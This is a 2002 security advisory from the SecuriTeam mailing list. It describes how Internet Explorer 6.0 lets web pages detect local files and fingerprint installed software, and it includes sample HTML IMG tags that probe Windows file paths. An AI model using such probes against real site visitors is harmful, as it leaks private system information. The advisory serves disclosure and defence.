[NT] Local File Detection and Installed Software Fingerprinting

From: support@securiteam.com
Date: 04/20/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Sat, 20 Apr 2002 17:56:28 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Local File Detection and Installed Software Fingerprinting
------------------------------------------------------------------------

SUMMARY

A security vulnerability in Internet Explorer (and probably in other
browsers) allows remote attackers to discover what software is installed
on the remote computer, by testing for the existence of certain files.
This vulnerability can be used to discover sensitive information on the
remote computer (for example the installed path of Windows, whether he has
Windows Media Player installed, or what version of MSN Messenger he is
using).

DETAILS

Vulnerable systems:
Although this advisory mainly focuses on Windows based systems and this
was tested only on IE 6.0. The same problem will probably exist in all
browsers and can probably also be exploited on *NIX based system.

Local file detection
It is possible to detect the presence of a certain local file when a user
views a webpage. This can be done in a lot of different ways depending on
the file type you want to detect: Images like gif-, jpg- and bmp-files can
be detected by opening them in the page and testing whether the
image-object's "complete" property is 'true', if it is 'true' the file
exist, if it is not 'true' the file doesn't exist.

Text files like txt-, htm- and html-files can be detected by opening them
in an IFRAME and waiting for the "onLoad"-event to fire, if it fires the
file exists, if it does not the event will not fire. Another way to detect
the files is to load them as a cascading style sheets (Further a bug in IE
allows us to read the files' content).

Installed software fingerprinting
If we are allowed to detect whether local files exist, we can start
fingerprinting what software was installed on the computer. All we need to
know is where the software installs its files.
For example, the Windows operating system installs by default its files in
"\WINDOWS\" or "\WINNT\", these directories contain such files as
"desktop.ini", "folder.htt", and many background images. If we want to
detect whether Windows is installed in the default directory, we can scan
for some images that are installed by default using the following code:
<IMG src="C:\WINDOWS\SETUP.BMP" onLoad="alert('detected in' +
this.src);">
<IMG src="C:\WINNT\Blue Lace 16.bmp" onLoad="alert('detected in' +
this.src);">
<IMG src="D:\WINDOWS\SETUP.BMP" onLoad="alert('detected in' +
this.src);">
<IMG src="D:\WINNT\Blue Lace 16.bmp" onLoad="alert('detected in' +
this.src);">
<IMG src="E:\WINDOWS\SETUP.BMP" onLoad="alert('detected in' +
this.src);">
<IMG src="E:\WINNT\Blue Lace 16.bmp" onLoad="alert('detected in' +
this.src);">
..etc...
<IMG src="Z:\WINDOWS\SETUP.BMP" onLoad="alert('detected in' +
this.src);">
<IMG src="Z:\WINNT\Blue Lace 16.bmp" onLoad="alert('detected in' +
this.src);">

Using some additional JavaScript we can make these kind of scans fully
automated and let them report the findings to a 3rd-party server.

Impact:
Virtually anyone can take advantage of this vulnerability and discovery
what software the visiting user has.

Demonstration:
A very good demonstration is available at:
 <http://spoor12.edup.tudelft.nl/SkyLined/docs/local_file_detecting.html>
http://spoor12.edup.tudelft.nl/SkyLined/docs/local_file_detecting.html

ADDITIONAL INFORMATION

The information has been provided by <mailto:SkyLined@edup.tudelft.nl>
Berend-Jan Wever.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Quantcast